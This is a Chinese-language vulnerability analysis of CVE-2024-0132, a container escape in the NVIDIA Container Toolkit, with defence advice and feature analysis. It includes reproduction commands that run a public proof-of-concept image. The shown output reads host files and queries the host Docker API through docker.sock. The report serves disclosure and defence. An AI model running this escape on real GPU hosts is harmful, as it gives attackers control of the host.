一、基本信息
|
|
|
---|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
二、组件简介
漏洞产生于 nvidia-container-cli 的库 libnvidia-container.so 中,他们都属于 libnvidia-container。 libnvidia-container和其他相关工具组成了 NVIDIA Container Toolkit。
NVIDIA Container Toolkit是由NVIDIA公司推出的一套工具,用于在容器化环境中实现GPU加速计算。它允许用户在Docker等容器平台中使用NVIDIA GPU,从而在容器中运行需要GPU支持的应用程序,如深度学习训练、推理、科学计算等。
-
libnvidia-container:提供了与容器运行时集成的底层库,负责管理GPU设备的挂载、驱动程序和CUDA库。 -
nvidia-container-runtime:这是一个容器运行时,扩展了标准的OCI(Open Container Initiative)运行时,使其支持GPU加速功能。 -
nvidia-docker2(已弃用):早期用于在Docker容器中使用NVIDIA GPU的插件,现在已被NVIDIA Container Toolkit取代。
三、漏洞作者
1. discoverer
1.1 Shir Tamari
Shir Tamari 是一位经验丰富的安全和技术研究员,专注于漏洞研究和实际黑客技术。他出身于 Israel Defense Forces, 目前,是云安全公司 Wiz 的研究主管。过去,他曾在研究、开发和产品领域为多家安全公司担任顾问。他挖掘了多个云安全领域知名漏洞,是 nvidia-container-toolkit 容器逃逸漏洞 CVE-2024-0132 的作者之一。
1.2 Ronen Shustin(ID: Ronen)
Ronen Shustin 是一位经验丰富的漏洞研究员,专注于云安全领域,曾在包括 Wiz、Check Point、以色列 8200 部队等知名组织任职。Ronen 在多个云平台上发现并报告了重要的安全漏洞,如 libnvidia-container CVE-2024-0132 容器逃逸漏洞、Azure PostgreSQL 数据库、GCP Cloud SQL 以及 IBM Cloud Databases for PostgreSQL 等。他在多个安全会议上发表了关于云安全和 Kubernetes 集群安全的演讲,并多次登上微软安全响应中心的安全研究员排行榜。
1.3 Andres Riancho(ID: andresriancho)
Andrés Riancho 是一位专注于攻击性应用安全和培训开发者编写安全代码的专家。他曾在Rapid7担任Web安全总监,领导团队改进了NeXpose的Web应用扫描器。他是开源Web应用安全扫描器w3af的创建者,该工具帮助用户识别和利用Web应用中的漏洞。他还为MercadoLibre和Despegar等拉美独角兽公司提供专业的安全咨询服务。安德烈斯热衷于在全球的安全和开发者大会上演讲,分享他在Web应用安全、漏洞利用和云安全等领域的丰富经验。他目前居住在阿根廷布宜诺斯艾利斯,并在全球范围内提供专业服务。
2. introducer: Jonathan Calmels(ID: 3XX0)
|
|
|
|
---|---|---|---|
|
|
|
|
Jonathan Calmels 是 NVIDIA 的系统软件工程师。他的工作主要侧重于 GPU 数据中心软件和深度学习的超大规模解决方案。
3. fixer: Evan Lezar(ID: elezar)
|
|
|
|
---|---|---|---|
|
|
|
|
Evan Lezar 是一位经验丰富的软件工程师,具有商业和学术背景。他在多种编程语言、角色和团队配置方面拥有超过十年的工作经验。Evan 就职于 NVIDIA。他在计算电磁学领域尤其擅长使用 NVIDIA CUDA 进行 GPU 加速,已发表多篇相关论文,并参与多个国际会议。此外,Evan 还积极参与开源项目,贡献于多个与 NVIDIA GPU 管理、Kubernetes 和容器技术相关的项目。他的研究成果不仅推动了学术界的发展,也在工业界得到了广泛应用。
四、漏洞详情
1. 介绍
1.1 相关特性介绍:CUDA 前向兼容
libnvidia-container支持 CUDA前向兼容(CUDA Forward Compatibility),它允许容器在主机驱动程序版本较旧的情况下,使用比主机驱动程序更新的CUDA库,从而使容器化的CUDA应用程序能够运行在更新的CUDA版本上, 而无需更新主机上的NVIDIA驱动。这对需要使用新特性或新版本CUDA的容器化应用程序而言非常有用,同时保持了与主机系统的兼容性和稳定性。
具体来说,libnvidia-container 将会把容器/usr/local/cuda/compat
目录下较新的CUDA库,挂载到容器 lib 目录。
1.2 漏洞介绍
NVIDIA Container Toolkit 的库 libnvidia-container 在处理CUDA 前向兼容特性时,会把容器/usr/local/cuda/compat
目录下的文件挂载到容器 lib(/usr/lib/x86_64-linux-gnu/等) 目录,挂载行为受到软链接攻击影响,可导致任意主机目录被以只读模式挂载到容器内,进而可导致容器逃逸。
2. 影响
2.1 范围
libnvidia-container >= 1.0.0, <= 1.16.1
详细测量结果参见: https://github.com/ssst0n3/poc-cve-2024-0132/issues/2
nvidia-container-toolkit, gpu-operator 因为依赖libnvidia-container而受影响;
nvidia-container-toolkit 支持3种模式:
-
legacy: 默认配置,受影响。 -
cdi: 可以手动设置,不受影响。 -
csv: 可以手动设置,不受影响。(此模式主要针对没有 NVML 可用的基于 Tegra 的系统, 官方未提供详细的使用教程,预计使用该模式的用户极少;使用csv模式需要用户手动设置要挂载的文件、设备,不涉及相关特性。)
2.2 危害
可导致任意主机目录被以只读模式挂载到容器内,通过 docker.sock 等文件可调用容器API实现容器逃逸。
2.2.1 CVSS3.1 8.6 (by ssst0n3
)
8.6 CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
|
|
|
---|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
2.2.2 CVSS3.1 9.0 (by NVIDIA
)
9.0 CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
|
|
---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
2.2.3 CVSS3.1 8.3 (by NIST:NVD
)
8.3 CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
|
|
---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
2.3 利用场景
影响允许用户运行任意镜像并在容器内使用NVIDIA GPU的服务。
五、防御
1. 漏洞存在性检测
可通过以下命令确认是否使用受影响版本。
(1) 查看 /etc/docker/daemon.json
或 /etc/containerd/config.toml
文件中是否包含 nvidia 字段。
以下示例说明,有使用NVIDIA Container Toolkit
root@localhost:~# cat /etc/docker/daemon.json |grep nvidia
"nvidia": {
"path": "nvidia-container-runtime"
root@localhost:~# cat /etc/containerd/config.toml |grep nvidia
"/usr/bin/nvidia-container-runtime"
(2) 执行相关命令 nvidia-container-runtime --version
等。
以下示例说明,使用的版本为 1.16.2, 不受此漏洞影响。
root@localhost:~# nvidia-container-runtime --version
NVIDIA Container Runtime version 1.16.2
commit: a5a5833c14a15fd9c86bcece85d5ec6621b65652
spec: 1.2.0
runc version 1.1.12-0ubuntu2~22.04.1
spec: 1.0.2-dev
go: go1.21.1
libseccomp: 2.5.3
2. 修复建议
英伟达已发布修复版本,升级至 v1.16.2 及以上版本可以修复。
可参考官方安装指导:https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/install-guide.html
3. 规避措施
-
避免执行不可信的镜像 -
或使用CDI方式使用gpu, 详见官方文档: (https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/cdi-support.html)
4. 漏洞利用检测
(1) 漏洞利用时会执行 mount 系统调用,可以通过该系统调用的参数检测。 (2) 也可以检测容器进程对主机文件的访问。
六、漏洞复现
1. nvidia-container-toolkit
-
复现环境: 华为云香港ECS(ubuntu 22.04, nvidia driver) + docker v27.1.0 + nvidia-container-toolkit v1.16.1 -
复现步骤: -
运行PoC镜像 -
目标现象: 显示在容器内访问了主机文件,可通过docker.sock调用docker API
更多版本的影响情况测量,详见 https://github.com/ssst0n3/poc-cve-2024-0132/issues/2
1.1 复现环境
购买华为云香港节点弹性云服务器,我购买的具体配置如下
-
计费模式:按需计费 -
区域/可用区:中国-香港 | 随机分配 -
实例规格:GPU加速型 | pi2.2xlarge.4 | 8vCPUs | 32GiB | GPU显卡: 1 * NVIDIA Tesla T4 / 1 * 16GiB -
操作系统镜像:Ubuntu 22.04 server 64bit with Tesla Driver 470.223.02 and CUDA 11.4
$ ssh wanglei-gpu3
root@wanglei-gpu3:~# nvidia-smi
Tue Oct 15 11:13:33 2024
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 470.223.02 Driver Version: 470.223.02 CUDA Version: 11.4 |
|-------------------------------+----------------------+----------------------+
| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |
| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |
| | | MIG M. |
|===============================+======================+======================|
| 0 Tesla T4 On | 00000000:00:0D.0 Off | 0 |
| N/A 30C P8 9W / 70W | 0MiB / 15109MiB | 0% Default |
| | | N/A |
+-------------------------------+----------------------+----------------------+
+-----------------------------------------------------------------------------+
| Processes: |
| GPU GI CI PID Type Process name GPU Memory |
| ID ID Usage |
|=============================================================================|
| No running processes found |
+-----------------------------------------------------------------------------+
下面开始安装docker和nvidia-container-toolkit
root@wanglei-gpu3:~# apt update && apt install docker.io -y
root@wanglei-gpu3:~# curl -fsSL https://nvidia.github.io/libnvidia-container/gpgkey | gpg --dearmor -o /usr/share/keyrings/nvidia-container-toolkit-keyring.gpg
&& curl -s -L https://nvidia.github.io/libnvidia-container/stable/deb/nvidia-container-toolkit.list |
sed 's#deb https://#deb [signed-by=/usr/share/keyrings/nvidia-container-toolkit-keyring.gpg] https://#g' |
tee /etc/apt/sources.list.d/nvidia-container-toolkit.list
root@wanglei-gpu3:~# apt-get update &&
apt-get install -y libnvidia-container1=1.16.1-1
libnvidia-container-tools=1.16.1-1
nvidia-container-toolkit-base=1.16.1-1
nvidia-container-toolkit=1.16.1-1
配置容器运行时 nvidia
root@wanglei-gpu3:~# nvidia-ctk runtime configure --runtime=docker
WARN[0000] Ignoring runtime-config-override flag for docker
INFO[0000] Config file does not exist; using empty config
INFO[0000] Wrote updated config to /etc/docker/daemon.json
INFO[0000] It is recommended that docker daemon be restarted.
root@wanglei-gpu3:~# systemctl restart docker
环境信息如下
root@wanglei-gpu3:~# nvidia-container-cli --version
cli-version: 1.16.1
lib-version: 1.16.1
build date: 2024-07-23T14:57+00:00
build revision: 4c2494f16573b585788a42e9c7bee76ecd48c73d
build compiler: x86_64-linux-gnu-gcc-7 7.5.0
build platform: x86_64
build flags: -D_GNU_SOURCE -D_FORTIFY_SOURCE=2 -DNDEBUG -std=gnu11 -O2 -g -fdata-sections -ffunction-sections -fplan9-extensions -fstack-protector -fno-strict-aliasing -fvisibility=hidden -Wall -Wextra -Wcast-align -Wpointer-arith -Wmissing-prototypes -Wnonnull -Wwrite-strings -Wlogical-op -Wformat=2 -Wmissing-format-attribute -Winit-self -Wshadow -Wstrict-prototypes -Wunreachable-code -Wconversion -Wsign-conversion -Wno-unknown-warning-option -Wno-format-extra-args -Wno-gnu-alignof-expression -Wl,-zrelro -Wl,-znow -Wl,-zdefs -Wl,--gc-sections
root@wanglei-gpu3:~#
root@wanglei-gpu3:~# nvidia-container-cli info
NVRM version: 470.223.02
CUDA version: 11.4
Device Index: 0
Device Minor: 0
Model: Tesla T4
Brand: Nvidia
GPU UUID: GPU-03ef96a1-75d6-9917-ed12-4db7f79bfa4b
Bus Location: 00000000:00:0d.0
Architecture: 7.5
root@wanglei-gpu3:~#
root@wanglei-gpu3:~# docker info
Client:
Version: 24.0.7
Context: default
Debug Mode: false
Server:
Containers: 0
Running: 0
Paused: 0
Stopped: 0
Images: 0
Server Version: 24.0.7
Storage Driver: overlay2
Backing Filesystem: extfs
Supports d_type: true
Using metacopy: false
Native Overlay Diff: true
userxattr: false
Logging Driver: json-file
Cgroup Driver: systemd
Cgroup Version: 2
Plugins:
Volume: local
Network: bridge host ipvlan macvlan null overlay
Log: awslogs fluentd gcplogs gelf journald json-file local logentries splunk syslog
Swarm: inactive
Runtimes: io.containerd.runc.v2 nvidia runc
Default Runtime: runc
Init Binary: docker-init
containerd version:
runc version:
init version:
Security Options:
apparmor
seccomp
Profile: builtin
cgroupns
Kernel Version: 5.15.0-76-generic
Operating System: Ubuntu 22.04.2 LTS
OSType: linux
Architecture: x86_64
CPUs: 8
Total Memory: 31.15GiB
Name: wanglei-gpu3
ID: bc9d2464-60ee-458d-93a0-fab77847a4b3
Docker Root Dir: /var/lib/docker
Debug Mode: false
Experimental: false
Insecure Registries:
127.0.0.0/8
Live Restore Enabled: false
1.2 漏洞复现
使用预先构建的poc镜像 ssst0n3/poc-cve-2024-0132 , 或临时构建。
root@wanglei-gpu3:~# git clone https://github.com/ssst0n3/poc-cve-2024-0132.git
root@wanglei-gpu3:~# cd poc-cve-2024-0132
root@wanglei-gpu3:~/poc-cve-2024-0132# docker build -t ssst0n3/poc-cve-2024-0132 .
...
root@wanglei-gpu3:~/poc-cve-2024-0132# docker run -ti --runtime=nvidia --gpus=all ssst0n3/poc-cve-2024-0132
+ cat /host/etc/hostname
wanglei-gpu3
+ curl --unix-socket /host-run/docker.sock http://localhost/containers/json
[{"Id":"6dac93a4b9aaa6e2db5bed64f550d111e6e9604375e3210b46b59b095635290f","Names":["/nifty_booth"],"Image":"ssst0n3/poc-cve-2024-0132","ImageID":"sha256:53f3d5c92e144343851ec800aa7a0af201517262498519cc4dfd53688da9b112","Command":"/bin/sh -c /entrypoint.sh","Created":1728996664,"Ports":[],"Labels":{"org.opencontainers.image.ref.name":"ubuntu","org.opencontainers.image.version":"24.04"},"State":"running","Status":"Up Less than a second","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"72649d2ea91c5c657b26de4af617b491e8f09bf9c2e5e8a44695ff10e68191b6","EndpointID":"be81eb91bfafd69bb442f3ccf9790ff5da9ae9ef42ad643aa4a686c3040f404b","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[]}]
2. gpu-operator
-
复现环境: 华为云香港CCE Standard(k8s v1.30) + docker v24.0.9 + gpu-operator v24.6.1 -
复现步骤: -
运行PoC镜像 -
目标现象: 显示在容器内访问了主机文件,可通过docker.sock调用docker API
测试gpu-operator的目的是证明,其受影响情况原因是其安装的 nvidia-container-toolkit, 故而未测量其他版本。
2.1 复现环境
购买华为云香港节点CCE集群,我购买的具体配置如下
-
计费模式:按需计费 -
集群版本:v1.30 -
添加节点: -
计费模式:按需计费 -
区域/可用区:中国-香港 | 随机分配 -
实例规格:GPU加速型 | pi2.2xlarge.4 | 8vCPUs | 32GiB | GPU显卡: 1 * NVIDIA Tesla T4 / 1 * 16GiB -
镜像:Ubuntu 22.04
root@wanglei-k8s-gpu-02862:~# lspci |grep NVIDIA
00:0d.0 3D controller: NVIDIA Corporation TU104GL [Tesla T4] (rev a1)
下面开始安装 gpu-operator
$ scp wanglei-k8s-gpu-kubeconfig.yaml wanglei-k8s-gpu-02862:
$ ssh wanglei-k8s-gpu-02862
root@wanglei-k8s-gpu-02862:~# curl -fsSL -o get_helm.sh https://raw.githubusercontent.com/helm/helm/master/scripts/get-helm-3 && chmod 700 get_helm.sh && ./get_helm.sh
Downloading https://get.helm.sh/helm-v3.16.3-linux-amd64.tar.gz
Verifying checksum... Done.
Preparing to install helm into /usr/local/bin
helm installed into /usr/local/bin/helm
root@wanglei-k8s-gpu-02862:~# helm repo add nvidia https://helm.ngc.nvidia.com/nvidia && helm repo update
WARNING: Kubernetes configuration file is group-readable. This is insecure. Location: /root/.kube/config
WARNING: Kubernetes configuration file is world-readable. This is insecure. Location: /root/.kube/config
"nvidia" has been added to your repositories
WARNING: Kubernetes configuration file is group-readable. This is insecure. Location: /root/.kube/config
WARNING: Kubernetes configuration file is world-readable. This is insecure. Location: /root/.kube/config
Hang tight while we grab the latest from your chart repositories...
...Successfully got an update from the "nvidia" chart repository
Update Complete. ⎈Happy Helming!⎈
root@wanglei-k8s-gpu-02862:~# helm install --wait --generate-name -n gpu-operator --create-namespace nvidia/gpu-operator --version=v24.6.1
WARNING: Kubernetes configuration file is group-readable. This is insecure. Location: /root/.kube/config
WARNING: Kubernetes configuration file is world-readable. This is insecure. Location: /root/.kube/config
NAME: gpu-operator-1733143549
LAST DEPLOYED: Mon Dec 2 20:45:52 2024
NAMESPACE: gpu-operator
STATUS: deployed
REVISION: 1
TEST SUITE: None
遇到 Init:CrashLoopBackOff
错误,不清楚原因。删除pod等待重建即可。
root@wanglei-k8s-gpu-02862:~# kubectl get pods -n gpu-operator
NAME READY STATUS RESTARTS AGE
gpu-feature-discovery-nmz44 0/1 Init:0/1 0 4m42s
gpu-operator-1733143549-node-feature-discovery-gc-c9474d8bfvxfv 1/1 Running 0 6m3s
gpu-operator-1733143549-node-feature-discovery-master-86985w2n8 1/1 Running 0 6m3s
gpu-operator-1733143549-node-feature-discovery-worker-5c7cp 1/1 Running 0 6m3s
gpu-operator-77fdfcd757-4gxq4 1/1 Running 0 6m3s
nvidia-container-toolkit-daemonset-xnfjx 1/1 Running 0 4m42s
nvidia-dcgm-exporter-9d8bp 0/1 Init:0/1 0 4m42s
nvidia-device-plugin-daemonset-dz84j 0/1 Init:0/1 0 4m42s
nvidia-driver-daemonset-w2xmw 1/1 Running 0 5m33s
nvidia-operator-validator-kjc2x 0/1 Init:CrashLoopBackOff 3 (23s ago) 4m42s
root@wanglei-k8s-gpu-02862:~# kubectl delete pod -n gpu-operator nvidia-operator-validator-kjc2x
root@wanglei-k8s-gpu-02862:~# kubectl get pods -n gpu-operator
NAME READY STATUS RESTARTS AGE
gpu-feature-discovery-nmz44 1/1 Running 0 8m7s
gpu-operator-1733143549-node-feature-discovery-gc-c9474d8bfvxfv 1/1 Running 0 9m28s
gpu-operator-1733143549-node-feature-discovery-master-86985w2n8 1/1 Running 0 9m28s
gpu-operator-1733143549-node-feature-discovery-worker-5c7cp 1/1 Running 0 9m28s
gpu-operator-77fdfcd757-4gxq4 1/1 Running 0 9m28s
nvidia-container-toolkit-daemonset-xnfjx 1/1 Running 0 8m7s
nvidia-cuda-validator-895qp 0/1 Completed 0 2m15s
nvidia-dcgm-exporter-9d8bp 1/1 Running 0 8m7s
nvidia-device-plugin-daemonset-2s7z2 1/1 Running 0 22s
nvidia-driver-daemonset-w2xmw 1/1 Running 0 8m58s
nvidia-operator-validator-gd74c 1/1 Running 0 2m17s
环境信息如下
root@wanglei-k8s-gpu-02862:~# kubectl exec -n gpu-operator nvidia-driver-daemonset-w2xmw nvidia-smi
kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead.
Mon Dec 2 12:57:22 2024
+-----------------------------------------------------------------------------------------+
| NVIDIA-SMI 550.90.07 Driver Version: 550.90.07 CUDA Version: 12.4 |
|-----------------------------------------+------------------------+----------------------+
| GPU Name Persistence-M | Bus-Id Disp.A | Volatile Uncorr. ECC |
| Fan Temp Perf Pwr:Usage/Cap | Memory-Usage | GPU-Util Compute M. |
| | | MIG M. |
|=========================================+========================+======================|
| 0 Tesla T4 On | 00000000:00:0D.0 Off | 0 |
| N/A 28C P8 9W / 70W | 1MiB / 15360MiB | 0% Default |
| | | N/A |
+-----------------------------------------+------------------------+----------------------+
+-----------------------------------------------------------------------------------------+
| Processes: |
| GPU GI CI PID Type Process name GPU Memory |
| ID ID Usage |
|=========================================================================================|
| No running processes found |
+-----------------------------------------------------------------------------------------+
2.2 漏洞复现
root@wanglei-k8s-gpu-02862:~# cat poc-cve-2024-0132.yaml
apiVersion: v1
kind: Pod
metadata:
name: poc-cve-2024-0132
spec:
restartPolicy: OnFailure
containers:
- name: poc-cve-2024-0132
image: "docker.io/ssst0n3/poc-cve-2024-0132:latest"
imagePullPolicy: IfNotPresent
resources:
limits:
nvidia.com/gpu: 1
root@wanglei-k8s-gpu-02862:~# kubectl apply -f poc-cve-2024-0132.yaml
pod/poc-cve-2024-0132 created
root@wanglei-k8s-gpu-02862:~# kubectl logs poc-cve-2024-0132
+ cat /host/etc/hostname
wanglei-k8s-gpu-02862
+ curl --unix-socket /host-run/docker.sock http://localhost/containers/json
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 77281 0 77281 0 0 12.6M 0 --:--:-- --:--:-- --:--:-- 14.7M
[{"Id":"5106c279c3a900712370fccaf6d0ee5e8cb40673ca5886a75a9265f7853e5f05","Names":["/k8s_poc-cve-2024-0132_poc-cve-2024-0132_default_09203b3a-10e4-490a-8f86-abdc1b36c8ae_0"],"Image":"sha256:5fa3c2349168a5c8b3927907399ba19e500d8d86e5c84315
...
3. nvidia-container-toolkit(CDI模式): 不受影响
-
复现环境: 华为云香港ECS(ubuntu 22.04, nvidia driver) + docker v27.1.0 + nvidia-container-toolkit v1.16.1 -
复现步骤: -
运行PoC镜像 -
目标现象: 显示在容器内访问了主机文件,可通过docker.sock调用docker API
3.1 复现环境
环境同 1.1 节。
按照1.1节:
-
安装docker和nvidia-container-toolkit -
配置容器运行时
$ apt update && apt install docker.io -y
$ curl -fsSL https://nvidia.github.io/libnvidia-container/gpgkey | gpg --dearmor -o /usr/share/keyrings/nvidia-container-toolkit-keyring.gpg
&& curl -s -L https://nvidia.github.io/libnvidia-container/stable/deb/nvidia-container-toolkit.list |
sed 's#deb https://#deb [signed-by=/usr/share/keyrings/nvidia-container-toolkit-keyring.gpg] https://#g' |
tee /etc/apt/sources.list.d/nvidia-container-toolkit.list
$ apt-get update &&
apt-get install -y libnvidia-container1=1.16.1-1
libnvidia-container-tools=1.16.1-1
nvidia-container-toolkit-base=1.16.1-1
nvidia-container-toolkit=1.16.1-1
$ nvidia-ctk runtime configure --runtime=docker
$ systemctl restart docker
安装完毕后设置CDI模式
$ nvidia-ctk cdi generate --output=/etc/cdi/nvidia.yaml
3.2 漏洞复现: 无法利用
root@wanglei-gpu:~# docker run --rm -ti --runtime=nvidia -e NVIDIA_VISIBLE_DEVICES=nvidia.com/gpu=all ssst0n3/poc-cve-2024-0132:latest
+ cat /host/etc/hostname
cat: /host/etc/hostname: Not a directory
+ curl --unix-socket /host-run/docker.sock http://localhost/containers/json
curl: (7) Failed to connect to localhost port 80 after 0 ms: Couldn't connect to server
七、漏洞分析
1. 原始特性分析
1.1 在容器中使用 nvidia gpu
可参考官方文档安装、使用nvidia gpu容器。nvidia-container-toolkit 借助 runc hook 在容器启动前,挂载相关必要驱动。
-
https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/install-guide.html -
https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/sample-workload.html
$ docker run --rm --runtime=nvidia --gpus all ubuntu nvidia-smi
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 470.223.02 Driver Version: 470.223.02 CUDA Version: 11.4 |
|-------------------------------+----------------------+----------------------+
| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |
| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |
| | | MIG M. |
|===============================+======================+======================|
| 0 Tesla T4 On | 00000000:00:0D.0 Off | 0 |
| N/A 29C P8 9W / 70W | 0MiB / 15109MiB | 0% Default |
| | | N/A |
+-------------------------------+----------------------+----------------------+
+-----------------------------------------------------------------------------+
| Processes: |
| GPU GI CI PID Type Process name GPU Memory |
| ID ID Usage |
|=============================================================================|
| No running processes found |
+-----------------------------------------------------------------------------+
1.2 nvidia-container-toolkit cuda 前向兼容特性
-
向前兼容性(Forward Compatibility):在计算机科学和软件工程中,向前兼容性是指一个系统、产品或标准能够与未来的版本协同工作的能力。也就是说,现有的软件或硬件能够在未来更新后,仍然保持功能或兼容性。 -
示例:一个使用旧版本编译的程序,能够在新版本的环境中运行。 -
向后兼容性(Backward Compatibility):是指新版本的系统、产品或标准能够与旧版本的组件协同工作的能力。 -
示例:一个新版本的软件能够读取旧版本的数据文件。
在 NVIDIA 的官方文档 "CUDA Compatibility Guide"(https://docs.nvidia.com/deploy/cuda-compatibility/index.html) 中,明确提到了 CUDA 的向前兼容性,强调应用程序能够在未来版本的 CUDA 驱动程序和硬件上运行。
★
"Forward Compatibility: Applications compiled on an earlier CUDA toolkit version can run on newer CUDA drivers and, in some cases, newer GPUs."
NVIDIA 在其文档中还提到,CUDA Runtime 提供了向前兼容性,允许应用程序在使用较新版本驱动程序的系统上运行。
★
"The CUDA runtime built into the CUDA driver guarantees binary compatibility and backward compatibility. Applications compiled against a particular version of the CUDA runtime can therefore run without recompilation on newer CUDA-capable GPUs and on systems with newer drivers."
具体来说,libnvidia-container 将会把容器/usr/local/cuda/compat
目录下较新的CUDA库,挂载到容器 lib
目录。
$ docker run --rm --runtime=nvidia --gpus all nvidia/cuda:12.6.2-cudnn-runtime-ubuntu24.04 cat /proc/self/mountinfo |grep compat
677 652 0:48 /usr/local/cuda-12.6/compat/libcuda.so.560.35.03 /usr/lib/x86_64-linux-gnu/libcuda.so.560.35.03 ro,nosuid,nodev,relatime master:265 - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/7PESVCWGEYV5EAUFQQOU54JC5I:/var/lib/docker/overlay2/l/PIMQYFKPYMVGLM7JIYDNWWQNMV:/var/lib/docker/overlay2/l/BOOUOLOLY4GM525O7PGZYXHWAR:/var/lib/docker/overlay2/l/JFDVXPNFZHK6MO35W275FXWJK2:/var/lib/docker/overlay2/l/DHPPA554ZRQ3RMXBAC4TCQ2ONI:/var/lib/docker/overlay2/l/7VXIOP6JUX5AQWZDCES4OSMUE3:/var/lib/docker/overlay2/l/VXIMXECSGJPSZSTCV4L3F5SSVF:/var/lib/docker/overlay2/l/GNHB2U3KK74XBRHDNTTRBPLO5V:/var/lib/docker/overlay2/l/CPLKLXQBHMU2HSD2KH7QST3XPC:/var/lib/docker/overlay2/l/5I4CMPNMDVNB4OH6B3LTCLKUX5:/var/lib/docker/overlay2/l/MZVFHZWHWZ6WESPEACUAGYRIW2,upperdir=/var/lib/docker/overlay2/a2f1240f551528f47be90b6b6c7e923470009998687bb7d77ab112c19e325f6e/diff,workdir=/var/lib/docker/overlay2/a2f1240f551528f47be90b6b6c7e923470009998687bb7d77ab112c19e325f6e/work
...
$ docker run --rm --runtime=nvidia --gpus all nvidia/cuda:12.6.2-cudnn-runtime-ubuntu24.04 nvidia-smi
==========
== CUDA ==
==========
CUDA Version 12.6.2
Container image Copyright (c) 2016-2023, NVIDIA CORPORATION & AFFILIATES. All rights reserved.
This container image and its contents are governed by the NVIDIA Deep Learning Container License.
By pulling and using the container, you accept the terms and conditions of this license:
https://developer.nvidia.com/ngc/nvidia-deep-learning-container-license
A copy of this license is made available in this container at /NGC-DL-CONTAINER-LICENSE for your convenience.
Tue Nov 26 12:40:00 2024
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 470.223.02 Driver Version: 470.223.02 CUDA Version: 12.6 |
|-------------------------------+----------------------+----------------------+
| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |
| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |
| | | MIG M. |
|===============================+======================+======================|
| 0 Tesla T4 On | 00000000:00:0D.0 Off | 0 |
| N/A 29C P8 9W / 70W | 0MiB / 15109MiB | 0% Default |
| | | N/A |
+-------------------------------+----------------------+----------------------+
+-----------------------------------------------------------------------------+
| Processes: |
| GPU GI CI PID Type Process name GPU Memory |
| ID ID Usage |
|=============================================================================|
| No running processes found |
+-----------------------------------------------------------------------------+
1.3 CDI
根据"Support for Container Device Interface — NVIDIA Container Toolkit documentation"(https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/cdi-support.html#):
从 v1.12.0 版本开始,NVIDIA 容器工具包支持生成容器设备接口(CDI)规范。CDI 是一个开放的容器运行时规范,它抽象了对设备(如 NVIDIA GPU)的访问含义,并在各个容器运行时中标准化了访问方式。流行的容器运行时可以读取并处理这一规范,以确保设备在容器中可用。CDI 简化了对 NVIDIA GPU 等设备的支持添加,因为该规范适用于所有支持 CDI 的容器运行时。
通过分析代码确认,CDI 模式通过将挂载配置、设备直接写入到 oci spec, 而不会执行 nvidia-container-cli configure
, 也就不会自行实现挂载了,同时也不支持 cuda 兼容特性。
$ nvidia-ctk cdi generate --output=/etc/cdi/nvidia.yaml
$ docker run --rm -ti --runtime=nvidia -e NVIDIA_VISIBLE_DEVICES=nvidia.com/gpu=all ubuntu cat /proc/self/mountinfo |grep overlay
643 534 0:48 / / rw,relatime master:265 - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/VWXTSEW55YTGJ23XYVXBZE6TIH:/var/lib/docker/overlay2/l/F3QZDOFKONMKPK4LRXRABM3LRQ,upperdir=/var/lib/docker/overlay2/8f5ca0eeb583611324034844687cbf1706d88b47273ba88624c02858b534fd5f/diff,workdir=/var/lib/docker/overlay2/8f5ca0eeb583611324034844687cbf1706d88b47273ba88624c02858b534fd5f/work
1.4 gpu-operator
参考 "官方文档"(https://docs.nvidia.com/datacenter/cloud-native/gpu-operator/latest/getting-started.html), 安装gpu-operator。
gpu-operator
将通过名为 nvidia-container-toolkit-daemonset
的容器,挂载主机目录,将 nvidia-container-toolkit 安装到主机的 /usr/local/nvidia
目录。
$ kubectl --kubeconfig wanglei-k8s-gpu-kubeconfig.yaml describe pod -n gpu-operator nvidia-container-toolkit-daemonset-fzznt
Name: nvidia-container-toolkit-daemonset-fzznt
Namespace: gpu-operator
Priority: 2000001000
Priority Class Name: system-node-critical
Node: 10.0.2.70/10.0.2.70
Start Time: Thu, 28 Nov 2024 21:00:54 +0800
Labels: app=nvidia-container-toolkit-daemonset
app.kubernetes.io/managed-by=gpu-operator
controller-revision-hash=5798fb59f4
helm.sh/chart=gpu-operator-v24.9.0
pod-template-generation=1
Annotations: <none>
Status: Running
IP: 172.16.0.146
IPs:
IP: 172.16.0.146
Controlled By: DaemonSet/nvidia-container-toolkit-daemonset
Init Containers:
driver-validation:
Container ID: containerd://0b6689ed6d9dc8c9103934a900a865faf4fc2604356097b3b151e9b5ffb28310
